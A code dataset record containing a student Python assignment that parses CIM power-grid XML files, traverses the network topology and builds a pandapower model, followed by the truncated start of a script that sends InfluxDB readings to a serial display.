image=img)\r\ncontent.grid(column=1, row=0)\r\nframe.grid(column=1, row=0, columnspan=3, rowspan=2)\r\npanel.grid(column=1, row=0, columnspan=3, rowspan=2)\r\n\r\n# Insert File\r\ndef EQ_file():\r\n EQ_file = filedialog.askopenfilename()\r\n global EQ_file_XML, Message_EQ\r\n EQ_file_XML = EQ_file\r\n Message_EQ = \"Added EQ File\"\r\n\r\ndef SSH_file():\r\n SSH_file = filedialog.askopenfilename()\r\n global SSH_file_XML, Message_SSQ\r\n SSH_file_XML = SSH_file\r\n Message_SSH = \"Added SSH File\"\r\n\r\n# GUI Layout\r\nButton_EQ = Button(root, text=\"Select EQ File\", command=EQ_file)\r\nButton_EQ.grid(column=1, row=3, sticky='nesw')\r\nButton_SSH = Button(root, text=\"Select SSH File\", command=SSH_file)\r\nButton_SSH.grid(column=1, row=4, sticky='nesw')\r\nButton_Run = Button(root, text=\"Run\", command=root.destroy)\r\nButton_Run.grid(column=1, row=5,sticky='nesw')\r\n\r\nroot.mainloop()\r\n\r\n# Parse the XML files\r\ntree_EQ = ET.parse(EQ_file_XML)\r\ntree_SSH = ET.parse(SSH_file_XML)\r\n\r\n# Get the root of the parsed trees\r\nroot_EQ = tree_EQ.getroot()\r\nroot_SSH = tree_SSH.getroot()\r\n\r\n# Define the namespaces used in the XML files\r\nns = {'cim': 'http://iec.ch/TC57/2013/CIM-schema-cim16#',\r\n 'entsoe': 'http://entsoe.eu/CIM/SchemaExtension/3/1#',\r\n 'md': 'http://iec.ch/TC57/61970-552/ModelDescription/1#',\r\n 'rdf': '{http://www.w3.org/1999/02/22-rdf-syntax-ns#}'}\r\n\r\n# Import the required classes from their respective modules\r\nfrom GeneratingUnit import GeneratingUnit\r\nfrom ACLineSegment import ACLineSegment\r\nfrom BusbarSection import BusbarSection\r\nfrom Breaker import Breaker\r\nfrom PowerTransformer import PowerTransformer\r\nfrom RatioTapChanger import RatioTapChanger\r\nfrom EnergyConsumer import EnergyConsumer\r\nfrom LinearShuntCompensator import LinearShuntCompensator\r\nfrom SynchronousMachine import SynchronousMachine\r\nfrom BaseVoltage import BaseVoltage\r\nfrom VoltageLevel import VoltageLevel\r\nfrom RegulatingControl import RegulatingControl\r\nfrom ConductingEquipment import ConductingEquipment\r\nfrom ConnectivityNode import ConnectivityNode\r\nfrom Terminal import Terminal\r\n\r\n# Initialize empty lists to store the extracted information from the EQ XML files\r\nACLine_Segment_length = []\r\nACLine_Segment_list = []\r\nACLine_Segment_name = []\r\nBaseVoltage_list = []\r\nBreaker_list = []\r\nBusbarSection_list = []\r\nConductingEquipment_list = []\r\nConnectivityNode_list = []\r\nConnectivityNode_list_id = []\r\nEnergyConsumer_list = []\r\nGeneratingUnit_list = []\r\nLinearShuntCompensator_list = []\r\nObject_name_list = []\r\nPowerTransformer_list = []\r\nRatioTapChanger_list = []\r\nRegulatingControl_list = []\r\nSynchronousMachine_list = []\r\nTerminal_list = []\r\nTerminal_list_ConductingEquipment = []\r\nTerminal_list_ConnectivityNode = []\r\nVoltageLevel_list = []\r\nnode_list = []\r\n\r\n# Initialize empty lists to store the extracted information from the SSH XML files\r\nBreaker_list_ssh = []\r\nEnergyConsumer_list_ssh = []\r\nObject_name_list_2 = []\r\nRatioTapChanger_list_ssh = []\r\nTerminal_list_ssh = []\r\n\r\n# Loop through the root_EQ list of equipment to mapping the attributes to the corresponding attributes\r\n# of the class and extract relevant data from the EQ XML file.\r\nfor equipment in root_EQ:\r\n if ns['cim'] in equipment.tag:\r\n name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n Object_name_list.append(name)\r\n # Check the type of equipment and create an instance of the corresponding class\r\n if name == 'BusbarSection':\r\n Busbar_Section = BusbarSection(equipment)\r\n Busbar_Section.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Busbar_Section.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Busbar_Section.Node_Type = 'CE'\r\n Busbar_Section.EquipmentContainer = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n BusbarSection_list.append(Busbar_Section)\r\n ConductingEquipment_list.append(Busbar_Section)\r\n Busbar_Section.CE_type = 'BusbarSection'\r\n\r\n elif name == 'ACLineSegment':\r\n ACLine_Segment = ACLineSegment(equipment)\r\n ACLine_Segment.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n ACLine_Segment.Node_Type = 'CE'\r\n ACLine_Segment.id = equipment.attrib.get(ns['rdf']+'ID')\r\n ACLine_Segment.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n ACLine_Segment.r = equipment.find('cim:ACLineSegment.r', ns).text\r\n ACLine_Segment.x = equipment.find('cim:ACLineSegment.x', ns).text\r\n ACLine_Segment.bch = equipment.find('cim:ACLineSegment.bch', ns).text\r\n ACLine_Segment.length = equipment.find('cim:Conductor.length', ns).text\r\n ACLine_Segment_list.append(ACLine_Segment)\r\n ACLine_Segment_name.append(ACLine_Segment.name)\r\n ACLine_Segment_length.append(ACLine_Segment.length)\r\n ConductingEquipment_list.append(ACLine_Segment)\r\n\r\n elif name == 'Breaker':\r\n Brea_ker = Breaker(equipment)\r\n Brea_ker.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Brea_ker.Node_Type = 'CE'\r\n Brea_ker.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Breaker_list.append(Brea_ker)\r\n ConductingEquipment_list.append(Brea_ker)\r\n\r\n elif name == 'EnergyConsumer':\r\n Energy_Consumer = EnergyConsumer(equipment)\r\n Energy_Consumer.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Energy_Consumer.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Energy_Consumer.aggregate = equipment.find('cim:Equipment.aggregate', ns).text\r\n Energy_Consumer.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Energy_Consumer.Node_Type = 'CE '\r\n EnergyConsumer_list.append(Energy_Consumer)\r\n ConductingEquipment_list.append(Energy_Consumer)\r\n\r\n elif name == 'GeneratingUnit':\r\n Generating_Unit = GeneratingUnit(equipment)\r\n Generating_Unit.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Generating_Unit.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Generating_Unit.initialP = equipment.find('cim:GeneratingUnit.initialP', ns).text\r\n Generating_Unit.nominalP = equipment.find('cim:GeneratingUnit.nominalP', ns).text\r\n Generating_Unit.maxOperatingP = equipment.find('cim:GeneratingUnit.maxOperatingP', ns).text\r\n Generating_Unit.minOperatingP = equipment.find('cim:GeneratingUnit.minOperatingP', ns).text\r\n Generating_Unit.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Generating_Unit.Node_Type = 'CE '\r\n GeneratingUnit_list.append(Generating_Unit)\r\n\r\n elif name == 'LinearShuntCompensator':\r\n LinearShunt_Compensator = LinearShuntCompensator(equipment)\r\n LinearShunt_Compensator.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n LinearShunt_Compensator.id = equipment.attrib.get(ns['rdf']+'ID')\r\n LinearShunt_Compensator.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n LinearShunt_Compensator.RegulatingControl = equipment.find('cim:RegulatingCondEq.RegulatingControl', ns).attrib.get(ns['rdf']+'resource')\r\n LinearShunt_Compensator.nomU = float(equipment.find('cim:ShuntCompensator.nomU', ns).text)\r\n LinearShunt_Compensator.b = float(equipment.find('cim:LinearShuntCompensator.bPerSection', ns).text)\r\n LinearShunt_Compensator.q = float(LinearShunt_Compensator.b*LinearShunt_Compensator.nomU*LinearShunt_Compensator.nomU)\r\n LinearShunt_Compensator.Node_Type = 'CE '\r\n LinearShuntCompensator_list.append(LinearShunt_Compensator)\r\n ConductingEquipment_list.append(LinearShunt_Compensator)\r\n\r\n elif name == 'VoltageLevel':\r\n Voltage_Level = VoltageLevel(equipment)\r\n Voltage_Level.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Voltage_Level.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Voltage_Level.lowVoltageLimit = equipment.find('cim:VoltageLevel.lowVoltageLimit', ns).text\r\n Voltage_Level.highVoltageLimit = equipment.find('cim:VoltageLevel.highVoltageLimit', ns).text\r\n Voltage_Level.Substation = equipment.find('cim:VoltageLevel.Substation', ns).attrib.get(ns['rdf']+'resource')\r\n Voltage_Level.BaseVoltage = equipment.find('cim:VoltageLevel.BaseVoltage', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n VoltageLevel_list.append(Voltage_Level)\r\n\r\n elif name == 'PowerTransformer':\r\n Power_Transformer = PowerTransformer(equipment)\r\n Power_Transformer.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Power_Transformer.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Power_Transformer.Node_Type = 'CE'\r\n Power_Transformer.EquipmentContainer = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n PowerTransformer_list.append(Power_Transformer)\r\n ConductingEquipment_list.append(Power_Transformer)\r\n\r\n elif name == 'RatioTapChanger':\r\n Ratio_TapChanger = RatioTapChanger(equipment)\r\n Ratio_TapChanger.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Ratio_TapChanger.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Ratio_TapChanger.Node_Type = 'CE'\r\n Ratio_TapChanger.TapChangerControl = equipment.find('cim:TapChanger.TapChangerControl', ns).attrib.get(ns['rdf']+'resource')\r\n Ratio_TapChanger.neutralU = equipment.find('cim:TapChanger.neutralU', ns).text\r\n Ratio_TapChanger.lowStep = equipment.find('cim:TapChanger.lowStep', ns).text\r\n Ratio_TapChanger.highStep = equipment.find('cim:TapChanger.highStep', ns).text\r\n Ratio_TapChanger.neutralStep = equipment.find('cim:TapChanger.neutralStep', ns).text\r\n Ratio_TapChanger.normalStep = equipment.find('cim:TapChanger.normalStep', ns).text\r\n Ratio_TapChanger.stepVoltageIncrement = equipment.find('cim:RatioTapChanger.stepVoltageIncrement', ns).text\r\n RatioTapChanger_list.append(Ratio_TapChanger)\r\n\r\n elif name == 'SynchronousMachine':\r\n Synchronous_Machine = SynchronousMachine(equipment)\r\n Synchronous_Machine.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Synchronous_Machine.id = equipment.attrib.get(ns['rdf']+'ID')\r\n SynchronousMachine_list.append(Synchronous_Machine)\r\n Synchronous_Machine.EquipmentContainer = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Synchronous_Machine.GeneratingUnit = equipment.find('cim:RotatingMachine.GeneratingUnit', ns).attrib.get(ns['rdf']+'resource')\r\n Synchronous_Machine.ratedU = equipment.find('cim:RotatingMachine.ratedU', ns).text\r\n Synchronous_Machine.Node_Type = 'CE'\r\n ConductingEquipment_list.append(Synchronous_Machine)\r\n\r\n elif name == 'BaseVoltage':\r\n Base_Voltage = BaseVoltage(equipment)\r\n Base_Voltage.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Base_Voltage.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Base_Voltage.Node_Type = 'CE'\r\n BaseVoltage_list.append(Base_Voltage)\r\n Base_Voltage.nominalVoltage = equipment.find('cim:BaseVoltage.nominalVoltage', ns).text\r\n\r\n elif name == 'ConnectivityNode':\r\n Connectivity_Node = ConnectivityNode(equipment)\r\n Connectivity_Node.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Connectivity_Node.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Connectivity_Node.container_id = equipment.find('cim:ConnectivityNode.ConnectivityNodeContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Connectivity_Node.Node_Type = 'CN'\r\n ConnectivityNode_list.append(Connectivity_Node)\r\n ConnectivityNode_list_id.append(Connectivity_Node.id)\r\n\r\n elif name == 'Terminal':\r\n T_erminal = Terminal(equipment)\r\n T_erminal.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n T_erminal.id = equipment.attrib.get(ns['rdf']+'ID')\r\n T_erminal.ConductingEquipment = equipment.find('cim:Terminal.ConductingEquipment', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n T_erminal.ConnectivityNode = equipment.find('cim:Terminal.ConnectivityNode', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n T_erminal.Node_Type = 'TE'\r\n T_erminal.traversal_flag = 0\r\n Terminal_list.append(T_erminal)\r\n Terminal_list_ConductingEquipment.append(\r\n T_erminal.ConductingEquipment.replace('#', ''))\r\n Terminal_list_ConnectivityNode.append(\r\n T_erminal.ConnectivityNode.replace('#', ''))\r\n\r\n# Loop through the root_EQ list of equipment to mapping the attributes to the corresponding attributes\r\n# of your class and extract relevant data from the SSH XML file.\r\nfor equipment in root_SSH:\r\n if ns['cim'] in equipment.tag:\r\n name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n Object_name_list_2.append(name)\r\n if name == 'Terminal':\r\n T_erminal = Terminal(equipment)\r\n T_erminal.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Terminal_list_ssh.append(T_erminal)\r\n\r\n elif name == 'EnergyConsumer':\r\n Energy_Consumer = EnergyConsumer(equipment)\r\n Energy_Consumer.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Energy_Consumer.p = equipment.find('cim:EnergyConsumer.p', ns).text\r\n Energy_Consumer.q = equipment.find('cim:EnergyConsumer.q', ns).text\r\n EnergyConsumer_list_ssh.append(Energy_Consumer.p)\r\n\r\n elif name == 'RatioTapChanger':\r\n Ratio_TapChanger = RatioTapChanger(equipment)\r\n Ratio_TapChanger.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Ratio_TapChanger.step = equipment.find('cim:TapChanger.step', ns).text\r\n Ratio_TapChanger.controlEnabled = equipment.find('cim:TapChanger.controlEnabled', ns).text\r\n RatioTapChanger_list_ssh.append(Ratio_TapChanger)\r\n\r\n elif name == 'Breaker':\r\n B_reaker = Breaker(equipment)\r\n B_reaker.id = equipment.attrib.get(ns['rdf']+'ID')\r\n B_reaker.Switch = equipment.find('cim:Switch.open', ns).text\r\n Breaker_list_ssh.append(Breaker)\r\n\r\n# Mapping Base Voltage and Nominal voltage of Busbar.\r\nfor equipment in root_EQ:\r\n if ns['cim'] in equipment.tag:\r\n name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n if name == 'BusbarSection':\r\n for Busbar_Section in BusbarSection_list:\r\n for Voltage_Level in VoltageLevel_list:\r\n if Busbar_Section.EquipmentContainer == Voltage_Level.id:\r\n for Base_Voltage in BaseVoltage_list:\r\n if Voltage_Level.BaseVoltage == Base_Voltage.id:\r\n Busbar_Section.voltage = float(\r\n Base_Voltage.nominalVoltage)\r\n\r\n# Mapping Base Voltage and Nominal voltage of Connectivity Node.\r\nfor equipment in root_EQ:\r\n if ns['cim'] in equipment.tag:\r\n name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n if name == 'ConnectivityNode':\r\n for CN in ConnectivityNode_list:\r\n for Voltage_Level in VoltageLevel_list:\r\n if CN.container_id == Voltage_Level.id:\r\n for Base_Voltage in BaseVoltage_list:\r\n if Voltage_Level.BaseVoltage == Base_Voltage.id:\r\n CN.voltage = float(\r\n Base_Voltage.nominalVoltage)\r\n\r\n\r\n# Network Travsersing\r\n\r\n# Finding the terminal connected to respective CN\r\n\r\nTerminal_attached_to_CN_list = []\r\ndef find_Terminal_attached_to_CN(CN):\r\n for TE in Terminal_list:\r\n if CN.id == TE.ConnectivityNode:\r\n return(TE)\r\n\r\ndef find_Terminal_attached_to_CN_list(CN):\r\n Terminal_attached_to_CN_list1 = []\r\n for TE in Terminal_list:\r\n if TE.ConnectivityNode == CN.id:\r\n Terminal_attached_to_CN_list1.append(TE)\r\n return(Terminal_attached_to_CN_list1)\r\n\r\nfor CN in ConnectivityNode_list:\r\n Terminal_attached_to_CN_list.append(find_Terminal_attached_to_CN(CN))\r\n\r\n# Finding the terminal connected to respective CE\r\ndef find_Terminal_attached_to_CE(CE):\r\n for TE in Terminal_list:\r\n if CE.id == TE.ConductingEquipment:\r\n return(TE)\r\n\r\ndef find_Terminal_attached_to_ConductingEquipment_list(CE):\r\n Terminal_attached_to_ConductingEquipment_list1 = []\r\n for TE in Terminal_list:\r\n if CE.id == TE.ConductingEquipment:\r\n Terminal_attached_to_ConductingEquipment_list1.append(TE)\r\n return(Terminal_attached_to_ConductingEquipment_list1)\r\n\r\nTerminal_attached_to_ConductingEquipment_list = []\r\nfor Node in ConductingEquipment_list:\r\n Terminal_attached_to_ConductingEquipment_list.append(find_Terminal_attached_to_CE(Node))\r\n\r\n# Find and return the next node based on the previous node and current node types\r\ndef find_next_node(previous_node, current_node):\r\n # If the current node is a ConnectivityNode ('CN'), return a randomly sampled terminal from Terminal_attached_to_CN_list\r\n if current_node.Node_Type == 'CN':\r\n return(random.sample(Terminal_attached_to_CN_list, 1))\r\n # If the current node is a ConductingEquipment ('CE'), return a randomly sampled terminal from Terminal_attached_to_ConductingEquipment_list\r\n elif current_node.Node_Type == 'CE':\r\n return(random.sample(Terminal_attached_to_ConductingEquipment_list, 1))\r\n # If the current node is a Terminal ('TE') and the previous node is a ConnectivityNode ('CN'), find the corresponding ConductingEquipment and return it\r\n elif current_node.Node_Type == 'TE' and previous_node.Node_Type == 'CN':\r\n for Node in ConductingEquipment_list: \r\n if current_node.ConductingEquipment == Node.id:\r\n return(Node)\r\n # If the current node is a Terminal ('TE') and the previous node is a ConductingEquipment ('CE'), find the corresponding ConnectivityNode and return it\r\n elif current_node.Node_Type == 'TE' and previous_node.Node_Type == 'CE':\r\n for Node in ConnectivityNode_list:\r\n if current_node.ConnectivityNode == Node.id:\r\n return(Node)\r\n\r\n\r\n# number of terminals attached to connectivity node\r\n\r\nnumber_list = []\r\n\r\ndef Num_attached_terminal_of_CN(CN):\r\n for TE in Terminal_attached_to_CN_list:\r\n if TE.ConnectivityNode == CN.id:\r\n number_list.append(TE)\r\n return(len(number_list))\r\n\r\n# number of terminals attached to ConductingEquipment\r\n\r\ndef Num_attached_terminal_of_CE(CE):\r\n for TE in Terminal_attached_to_ConductingEquipment_list:\r\n try:\r\n if TE.ConductingEquipment == CE.id:\r\n number_list.append(TE)\r\n return(len(number_list))\r\n except:\r\n pass\r\n\r\n# find CN attach to bus\r\nCN_attached_to_busbar_list = []\r\nCN_name = []\r\nfor CN in ConnectivityNode_list:\r\n for TE in find_Terminal_attached_to_CN_list(CN):\r\n next_node = find_next_node(CN, TE)\r\n try:\r\n if next_node.CE_type == 'BusbarSection':\r\n CN_attached_to_busbar_list.append(CN)\r\n CN_name.append(CN.name)\r\n except:\r\n pass\r\n#print(CN_attached_to_busbar_list)\r\nprint(CN_name)\r\n\r\nCN_not_attached_to_busbar = []\r\nCN_not_name = []\r\n\r\nfor CN in ConnectivityNode_list:\r\n if CN not in CN_attached_to_busbar_list:\r\n CN_not_name.append(CN.name)\r\n CN_not_attached_to_busbar.append(CN)\r\n\r\n\r\n#print(CN_not_attached_to_busbar)\r\nprint(CN_not_name)\r\n\r\n# Initialize an empty stack\r\nAll_stack = []\r\n\r\n# Traverse through the ConnectivityNode_list and its attached terminals to create stacks of connected elements\r\n# Each stack represents a connected path in the network\r\n# Store all the created stacks in the All_stack list\r\n\r\nfor CN in ConnectivityNode_list:\r\n if Num_attached_terminal_of_CN(CN) > 0:\r\n for TE in find_Terminal_attached_to_CN_list(CN):\r\n if TE.traversal_flag == 0:\r\n current_node = CN\r\n CN.Num_attachTerms -= 1 \r\n TE.traversal_flag = 1\r\n previous_node = current_node\r\n current_node = TE\r\n next_node = find_next_node(previous_node, current_node) \r\n CN_CE_stack = [CN]\r\n CN_CE_stack.append(next_node)\r\n CE = next_node \r\n try:\r\n if Num_attached_terminal_of_CE(CE) > 1:\r\n for TE in find_Terminal_attached_to_ConductingEquipment_list(CE):\r\n if TE.traversal_flag == 0: \r\n TE.traversal_flag = 1\r\n next_node = find_next_node(CE, TE)\r\n CN_CE_stack.append(next_node)\r\n except:\r\n pass\r\n \r\n if CN_CE_stack not in All_stack: \r\n All_stack.append(CN_CE_stack)\r\nprint(All_stack)\r\n\r\n#Create network in Pandapower.\r\n\r\nimport pandapower.networks\r\nfrom pandapower.plotting import simple_plot\r\nfrom pandapower.plotting.plotly import vlevel_plotly, simple_plotly\r\nfrom pandapower.networks import mv_oberrhein\r\nimport pandapower as pp\r\n\r\n# create component for panda power\r\nnet = pp.create_empty_network()\r\n\r\n# create busbar 'b' and node 'n'\r\n\r\nfor Busbar_Section in BusbarSection_list:\r\n pp.create_bus(net, name=Busbar_Section.name, vn_kv=Busbar_Section.voltage, type=\"b\")\r\n\r\nfor CN in CN_not_attached_to_busbar:\r\n pp.create_bus(net, name=CN.name, vn_kv=CN.voltage, type=\"n\")\r\n \r\nprint(net.bus)\r\n\r\n# Define function to find the busbar for connectivit node attached to terminal\r\n\r\ndef find_busbar_for_connectivity_node(CN):\r\n lista = find_Terminal_attached_to_CN_list(CN)\r\n for TE in lista:\r\n bus = find_next_node(CN, TE)\r\n try:\r\n if bus.CE_type == 'BusbarSection':\r\n return(pp.get_element_index(net, \"bus\", bus.name))\r\n if bus.CE_type == 'Breaker':\r\n return(pp.get_element_index(net, \"bus\", CN.name))\r\n except:\r\n pass\r\n\r\n# The ACLineSegment, breaker and transformer are Conducting equipments that come between two CNs,\r\n# hence, we consider item[0] and item [1].\r\n\r\n# create line\r\nfor item in All_stack:\r\n for lines in item:\r\n try:\r\n if lines.CE_type == 'ACLineSegment':\r\n pp.create_line(net, find_busbar_for_connectivity_node(item[0]), find_busbar_for_connectivity_node(\r\n item[-1]), length_km=2, std_type=\"N2XS(FL)2Y 1x300 RM/35 64/110 kV\", name=lines.name)\r\n except:\r\n pass\r\nprint(net.line)\r\n\r\n\r\n\r\n# create breaker\r\nfor item in All_stack:\r\n for breaker in item:\r\n try:\r\n if breaker.CE_type == 'Breaker':\r\n if breaker.state == 'false':\r\n pp.create_switch(net, find_busbar_for_connectivity_node(item[0]), find_busbar_for_connectivity_node(item[-1]), et=\"b\", type=\"CB\", closed=True)\r\n if breaker.state == 'ture':\r\n pp.create_switch(net, find_busbar_for_connectivity_node(item[0]), find_busbar_for_connectivity_node(item[-1]), et=\"b\", type=\"CB\", closed=False)\r\n except:\r\n pass\r\nnet.switch\r\nprint(net.switch)\r\n\r\n# create transformer\r\n\r\n# For transformers the high and low voltage busbars need to be determined\r\n\r\nfor item in All_stack:\r\n for transformer in item:\r\n try:\r\n if transformer.CE_type == 'Transformer':\r\n if item[0].voltage > item[2].voltage:\r\n busbar_hv = find_busbar_for_connectivity_node(item[0])\r\n busbar_lv = find_busbar_for_connectivity_node(item[2])\r\n else:\r\n busbar_hv = find_busbar_for_connectivity_node(item[2])\r\n busbar_lv = find_busbar_for_connectivity_node(item[0])\r\n pp.create_transformer(\r\n net, busbar_hv, busbar_lv, name=transformer.name, std_type=\"25 MVA 110/20 kV\")\r\n except:\r\n pass\r\n \r\nprint(net.trafo)\r\n\r\n# The Load, Syncronous generator and shunt compensator are end devices and hence we use only item[0]\r\n\r\n# create load\r\nfor item in All_stack:\r\n for load in item:\r\n try:\r\n if load.CE_type == 'load':\r\n pp.create_load(net, find_busbar_for_connectivity_node(item[0]), load.p, load.q, scaling=0.6, name=load.name)\r\n except:\r\n pass\r\nprint(net.load)\r\n\r\n# create generators\r\ncheck = []\r\nfor item in All_stack:\r\n for generator in item:\r\n try:\r\n if generator.CE_type == 'SynchronousMachine':\r\n check.append(generator)\r\n pp.create_sgen(net, find_busbar_for_connectivity_node(item[0]), p_mw=0.9, q_mvar=0.9, name=generator.name)\r\n except:\r\n pass\r\nprint(net.sgen)\r\n\r\n# create Compensator\r\nfor item in All_stack:\r\n for Compensator in item:\r\n try:\r\n if Compensator.CE_type == 'Compensator':\r\n pp.create_shunt(net, find_busbar_for_connectivity_node(item[0]), q_mvar=0.01*Compensator.q, p_mw=0, name=Compensator.name)\r\n except:\r\n pass \r\n\r\nprint(net.shunt)\r\n\r\nprint(net)\r\n\r\n# plot the network\r\npp.plotting.simple_plot(net)", "repo_name": "SarikaVG/Assignment_1_EH2745_Amritha-Sarika", "sub_path": "Assignment_1_EH2745.py", "file_name": "Assignment_1_EH2745.py", "file_ext": "py", "file_size_in_byte": 26818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.ttk.Frame", "line_number": 20, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 20, "usage_type": "name"}, {"api_name": "tkinter.ttk.Frame", "line_number": 21, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 21, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 23, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 30, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 30, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 36, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 36, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 52, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 52, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 53, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 53, "usage_type": "name"}, {"api_name": "BusbarSection.BusbarSection", "line_number": 121, "usage_type": "call"}, {"api_name": "ACLineSegment.ACLineSegment", "line_number": 131, "usage_type": "call"}, {"api_name": "Breaker.Breaker", "line_number": 146, "usage_type": "call"}, {"api_name": "EnergyConsumer.EnergyConsumer", "line_number": 154, "usage_type": "call"}, {"api_name": "GeneratingUnit.GeneratingUnit", "line_number": 164, "usage_type": "call"}, {"api_name": "LinearShuntCompensator.LinearShuntCompensator", "line_number": 176, "usage_type": "call"}, {"api_name": "VoltageLevel.VoltageLevel", "line_number": 189, "usage_type": "call"}, {"api_name": "PowerTransformer.PowerTransformer", "line_number": 199, "usage_type": "call"}, {"api_name": "RatioTapChanger.RatioTapChanger", "line_number": 208, "usage_type": "call"}, {"api_name": "SynchronousMachine.SynchronousMachine", "line_number": 222, "usage_type": "call"}, {"api_name": "BaseVoltage.BaseVoltage", "line_number": 233, "usage_type": "call"}, {"api_name": "ConnectivityNode.ConnectivityNode", "line_number": 241, "usage_type": "call"}, {"api_name": "Terminal.Terminal", "line_number": 250, "usage_type": "call"}, {"api_name": "Terminal.Terminal", "line_number": 270, "usage_type": "call"}, {"api_name": "EnergyConsumer.EnergyConsumer", "line_number": 275, "usage_type": "call"}, {"api_name": "RatioTapChanger.RatioTapChanger", "line_number": 282, "usage_type": "call"}, {"api_name": "Breaker.Breaker", "line_number": 289, "usage_type": "call"}, {"api_name": "Breaker.Breaker", "line_number": 292, "usage_type": "argument"}, {"api_name": "pandapower.create_empty_network", "line_number": 469, "usage_type": "call"}, {"api_name": "pandapower.create_bus", "line_number": 474, "usage_type": "call"}, {"api_name": "pandapower.create_bus", "line_number": 477, "usage_type": "call"}, {"api_name": "pandapower.get_element_index", "line_number": 489, "usage_type": "call"}, {"api_name": "pandapower.get_element_index", "line_number": 491, "usage_type": "call"}, {"api_name": "pandapower.create_line", "line_number": 503, "usage_type": "call"}, {"api_name": "pandapower.create_switch", "line_number": 517, "usage_type": "call"}, {"api_name": "pandapower.create_switch", "line_number": 519, "usage_type": "call"}, {"api_name": "pandapower.create_transformer", "line_number": 539, "usage_type": "call"}, {"api_name": "pandapower.create_load", "line_number": 553, "usage_type": "call"}, {"api_name": "pandapower.create_sgen", "line_number": 565, "usage_type": "call"}, {"api_name": "pandapower.create_shunt", "line_number": 575, "usage_type": "call"}, {"api_name": "pandapower.plotting.simple_plot", "line_number": 584, "usage_type": "call"}, {"api_name": "pandapower.plotting", "line_number": 584, "usage_type": "attribute"}]} +{"seq_id": "33900519074", "text": "import influxdb\nimport serial\nimport time\nfrom datetime import datetime\n\nhost = ''\nport = 8086\ndatabase = ''\nusername = ''\npassword = ''\ndevice1 = ''\ndevice2 = ''\ndevice3 = ''\nmeasurement = ''\nt = 'time'\n\nwhile True:\n\tclient = influxdb.InfluxDBClient(host=host, port=port, database=database, \n\tusername=username, password=password)\n\n\tresults = client.query((\"SELECT time, %s,%s,%s FROM %s ORDER BY time DESC LIMIT 1\") % \n\t\t\t\t(device1, device2, device3, measurement))\n\tpoints = results.get_points()\n\n\tfor item in points:\n\t a = (item[device1])\n\t b = (item[device2])\n\t c = (item[device3])\n\t tm = (item[t])\n\t \n\t #print \"Udaje boli namerane \" + tm\n\t #print a\n\t #print b\n\t #print c\n\n\tclient.close()\n\n#---------Display-----------#\n\t\n\t#Set end of file\n\teof = \"\\xff\\xff\\xff\"\n\n\tcon = serial.Serial(\n\n\t port='/dev/serial0',\n\t baudrate=9600,\n\t parity=serial.PARITY_NONE,\n\t stopbits=serial.STOPBITS_ONE,\n\t bytesize=serial.EIGHTBITS,\n\t)\n\n\talt1 = 'page0.t1.txt=\"'+str(a)+'\"'+eof\n\talt2 = 'page0.t2.txt=\"'+str(b)+'\"'+eof\n\talt3 = 